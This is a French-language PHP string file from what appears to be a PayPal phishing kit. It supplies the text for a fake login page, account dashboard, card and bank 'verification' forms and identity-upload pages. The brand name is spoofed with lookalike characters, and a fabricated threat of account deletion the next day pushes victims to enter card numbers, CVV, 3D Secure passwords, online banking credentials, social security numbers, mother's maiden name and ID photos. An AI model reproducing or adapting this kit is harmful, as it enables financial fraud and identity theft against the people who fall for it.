<?   
include('../hyun.php');
date_default_timezone_set('GMT');
$date = date('Y');
$next_day = date('d')+1;
$date_day = date('M Y');
$language = array(
            'index'     => array(
            '0' => 'Envoyer de l\'argent, payer en ligne ou configurer un compte marchand - PayPaI',
            '1' => 'Menu',
            '2' => 'Personnel',
            '3' => 'Qu\'est-ce que PayPaI? <em> Apprenez comment PayPaI fonctionne dans votre vie quotidienne</em>',
            '4' => 'Vérifiez en toute sécurité en ligne <em> Utilisez vos cartes de crédit ou d\'autres fonds </em>',
            '5' => 'PayPaI Crédit &amp; Cartes <em> Notre crédit, débit, cartes prépayées et amp; Crédit PayPaI </em>',
            '6' => 'PayPaI App <em> Transférer de l\'argent et suivre l\'activité avec notre application </em>',
            '7' => 'PayPaI Can Do That <em>Découvrez des façons de gérer et de déplacer votre argent </em>',
            '8' => 'Shopping et Plus <em> Offres, cartes-cadeaux et dons</em>',
            '9' => 'Fermer',
            '10' => 'Entreprise',
            '11' => 'Toutes les solutions commerciales <em>Services marchands, facturation, etc.</em>',
            '12' => 'Soyez payé en personne <em>Lecteurs de cartes mobiles et solutions POS</em>',
            '13' => 'Traitement des cartes de crédit <em>Accepter les cartes de crédit, de débit et PayPaI</em>',
            '14' => 'Prêts aux petites entreprises <em>Financement rapide et équitable</em>',
            '15' => 'Ajouter PayPaI à votre commande <em>Ajouter le bouton pour accepter les paiements</em>',
            '16' => 'Offrir du crédit à vos clients <em>Promouvoir le financement pour augmenter les ventes</em>',
            '17' => 'Envoyer',
            '18' => 'Demande',
            '19' => 'S\'inscrire gratuitement',
            '20' => 'Avec PayPaI, vous pouvez payer votre chemin.',
            '21' => 'Ajoutez des comptes de crédit, de débit et de banque à votre portefeuille numérique et faites votre choix à la caisse.',
            '22' => 'En savoir plus',
            '23' => 'Connectez-vous à votre compte',
            '24' => 'Votre compte déborde de possibilités.',
            '25' => 'Commencez',
            '26' => 'Nous sommes plus qu\'un moyen de payer. Découvrez ce que PayPaI a à offrir. ',
            '27' => 'Payez votre chemin',
            '28' => 'Notre portefeuille numérique vous permet d\'ajouter des comptes de crédit, de débit et de banque afin que vous puissiez décider comment payer.',
            '29' => 'Protection d\'achat',
            '30' => 'Si vous ne recevez pas exactement ce que vous avez commandé, nous vous aiderons à récupérer votre argent. ',
            '31' => 'Envoyer de l\'argent',
            '32' => 'Avec une adresse e-mail ou un numéro de téléphone PayPaI, vous pouvez envoyer de l\'argent presque n\'importe où en un instant.',
            '33' => 'Transfert de fonds',
            '34' => 'Voir l\'éligibilité &amp; acheter des limitations de protection.',
            '35' => 'Aide &amp; Contact',
            '36' => 'Les frais',
            '37' => 'Sécurité',
            '38' => 'Applications',
            '39' => 'Boutique',
            '40' => 'Voir tous les pays',
            '41' => 'Recherche',
            '42' => 'À propos',
            '43' => 'Blog',
            '44' => 'Emplois',
            '45' => 'Relations avec les investisseurs',
            '46' => 'Innovation sociale',
            '47' => 'Politique publique',
            '48' => 'Sitemap',
            '49' => 'Enterprise',
            '50' => 'Partenaires',
            '51' => '© 1999–'.$date.' ',
            '52' => 'Intimité',
            '53' => 'Légal',
            '54' => 'Feedback',
), 
            'login'     => array(
            '1' => 'Connectez-vous à votre compte ΡаyΡаI',
            '2' => 'Vérifiez votre saisie et réessayez.',
            '3' => 'Entrez votre addresse email.',
            '4' => 'Connexion',
            '5' => 'Ouvrir un compte',
            '6' => 'Vérification de vos informations…',
            '7' => 'Addresse email',
            '8' => 'Entez un mot de passe',
            '9' => 'Des difficultés pour vous connecter ?',
            '10' => 'Afficher',
            '11' => 'Masquer',
            '12' => 'OU',
            '13' => 'Entrez votre mot de passe.',
),

        'bar'     => array(
            '1' => 'Synthèse',
            '2' => 'Activité',
            '3' => 'Envoyer / Demander',
            '4' => 'Portefeuille',
            '5' => 'Shopping',
            '6' => 'Aide',
            '7' => 'Notifications',
            '8' => 'Messages',
            '9' => 'Paramètres',
            '10' => 'Compte',
            '11' => 'Il y a un problème avec votre compte',
            '12' => 'Veuillez le résoudre pour un accès complet à votre compte',
            '13' => 'Vous n\'avez pas de nouveaux messages',
            '14' => 'Consulter les messages',
            '15' => 'OPTIONS DU',
            '16' => 'FERMER',
            '17' => 'Déconnexion', 
            '18' => 'Vous n\'avez pas de nouvelles notifications',
            '19' => 'Recherche',
),

        'home'     => array(
            '1' => 'Fournir une preuve de votre adresse',
            '2' => 'Enregistrement de vos informations ...',
            '3' => 'Continue',
            '4' => 'Confirmez votre carte',
            '5' => 'Nom et prénoms du titulaire',
            '6' => 'Numéro de carte',
            '7' => 'Expirаtion MM/YY',
            '8' => 'CVV/CSC',
            '9' => 'Sélectionnez une adresse de facturation',
            '10' => 'Confirmez votre adresse de facturation',
            '11' => 'Confirmer',
            '12' => 'Confirmez votre adresse de facturation',
            '13' => 'Ligne d\'adresse 1',
            '14' => 'Ligne d\'adresse 2 (facultatif)',
            '15' => 'Code postal',
            '16' => 'Cité / Ville / Village',
            '17' => 'Annuler',
            '18' => 'Impact du compte',
            '19' => 'haut',
            '20' => 'Aujourd\'hui',
            '21' => 'Retirer de l\'argent de PayPal',
            '22' => 'Retour',
            '23' => 'Recevoir de l\'argent ou des paiements',
            '24' => 'Envoyer de l\'argent ou des paiements',
            '25' => 'Payer en utilisant PayPal',
            '26' => 'Votre compte est limité',
            '27' => 'Nous remarquons une activité inhabituelle et voulons nous assurer que personne ne s\'est connecté à votre compte sans votre permission. Aidez-nous à nous assurer que votre compte est sécurisé en répondant à quelques questions.',
            '28' => 'Numéro de référence: PP-541-002-511-021',
            '29' => 'Aidez-nous à comprendre l\'activité de votre compte en effectuant les étapes suivantes',
            '30' => 'Confirmez votre carte',
            '31' => 'Fournir une preuve de votre adresse',
            '32' => 'Télécharger une photo d\'identité',
            '33' => 'Si cette limitation n\'est bientôt résolu, nous supprimerons définitivement votre compte en la date du <b>'.$next_day.' '.$date_day.'</b>.',
            
),

        'id'     => array(
            '1' => 'Confirmez votre identité',
            '2' => 'Veuillez utiliser l\'un des types de fichiers autorisés (jpg, gif, png, bmp).',
            '3' => 'Veuillez sélectionner une option pour continuer.',
            '4' => 'Type de document',
            '5' => 'Veuillez télécharger un document qui indique le nom et la date de naissance du titulaire du compte principal.',
            '6' => 'Parcourir le fichier',
            '7' => 'JPG GIF PNG PDF | 5Mo chacun',
            '8' => 'Erreur cette option n\'est pas disponible pour un instant.',
            '9' => 'De face:',
            '10' => 'Arrière:',
            '11' => 'Ajouter un fichier',
            '12' => 'Fournir une preuve de votre adresse',
            '13' => 'Veuillez télécharger un document contenant l\'adresse associée à votre compte PayPal.',
            '14' => 'Facture d\'utilité (gaz, eau, électricité ou mobile)',
            '15' => 'Relevé bancaire',
            '16' => 'Déclaration de carte de crédit',
            '17' => 'Permis de conduire',
            '18' => 'Passeport',
            '19' => 'Carte d\'identité',
),


        'bank'     => array(
            '1' => 'Enregistrez votre compte bancaire',
            '2' => 'Veuillez noter que les informations saisies ne sont valables que pour la vérification de votre compte. C\'est sécurisé, et nous ne sauvegardons pas cette information.',
            '3' => 'Courant',
            '4' => 'Épargne',
            '5' => 'Identifiant',
            '6' => 'Mot de passe',
            '7' => 'RIB',
            '8' => 'Confirmer le RIB',
            '9' => 'Accepter et enregistrer',
            '10' => 'Veuillez uniquement saisir les 09 premiers chiffres du IBAN .<P> Contactez votre banque si vous avez besoin d\'aide.',
            '11' => 'Ressaisir les 09 premiers chiffres pour vérifier le compte.',
),


        'details'     => array(
            '1' => 'Informations de carte',
            '2' => 'Adresse de facturation',
            '3' => 'Date d’expiration',
            '4' => 'Non confirmé',
            '5' => 'Confirmer la carte de crédit',

),




    'secure'        => array(
            '1' => 'Sécurité ajoutée en ligne',
            '2' => 'sécurisé protège votre carte contre une utilisation non autorisée en ligne, sans frais.',
            '22' => 'sur ce et les futurs achats. complétez cette page Vous allez créer votre propre mot de passe.',
            '3' => 'Marchande:',
            '4' => 'ΡаyΡаI Inc.',
            '5' => 'Montant:',
            '6' => '0.01',
            '7' => 'Date:',
            '8' => 'Numéro de carte:',
            '9' => 'Type de carte:',
            '10' => 'Nom de banque:',
            '11' => 'Mot de passe sécurisé 3D:',
            '12' => 'Date de naissance du titulaire principal de la carte:',
            '13' => 'Numéro de téléphone personnel:',
            '14' => 'Le nom de la mère:',
            '15' => 'Code de tri:',
            '16' => 'Confirmer maintenant',
            '17' => 'Pays:',
            '18' => 'Numéro de sécurité sociale:',
            '19' => 'Numéro de compte:',
            '20' => 'En traitement',
            '21' => 'Patientez s\'il-vous-plait<br>nous traitons vos informations...',



        ),
    'thanks'   =>array(

            '1' => 'Merci de fournir les informations requises.',
            '2' => 'Vous pouvez utiliser votre compte maintenant et nous vous répondrons dans les 2-3 jours ouvrables.',
            '3' => 'Lier et confirmer votre compte bancaire',
            '4' => 'Aller à votre résumé',

             ),

    'copyright'       =>array(

            '1' => 'Respect de la vie privée',
            '2' => 'Contrats d\'utilisation',
            '3' => 'Copyright © 1999-'.$date.' PayPal. Tous droits réservés.',
            '4' => 'Avis aux utilisateurs : ΡаyΡаI Pte. Ltd. détenteur de la fonction de porte-monnaie électronique de ΡаyΡаI, n\'est pas soumis à l\'approbation de la Monetary Authority of Singapore. Nous invitons les utilisateurs à lire attentivement les <b>Conditions générales.</b>',
            '5' => 'Contact',
            '6' => 'Sécurité',

            ));

?>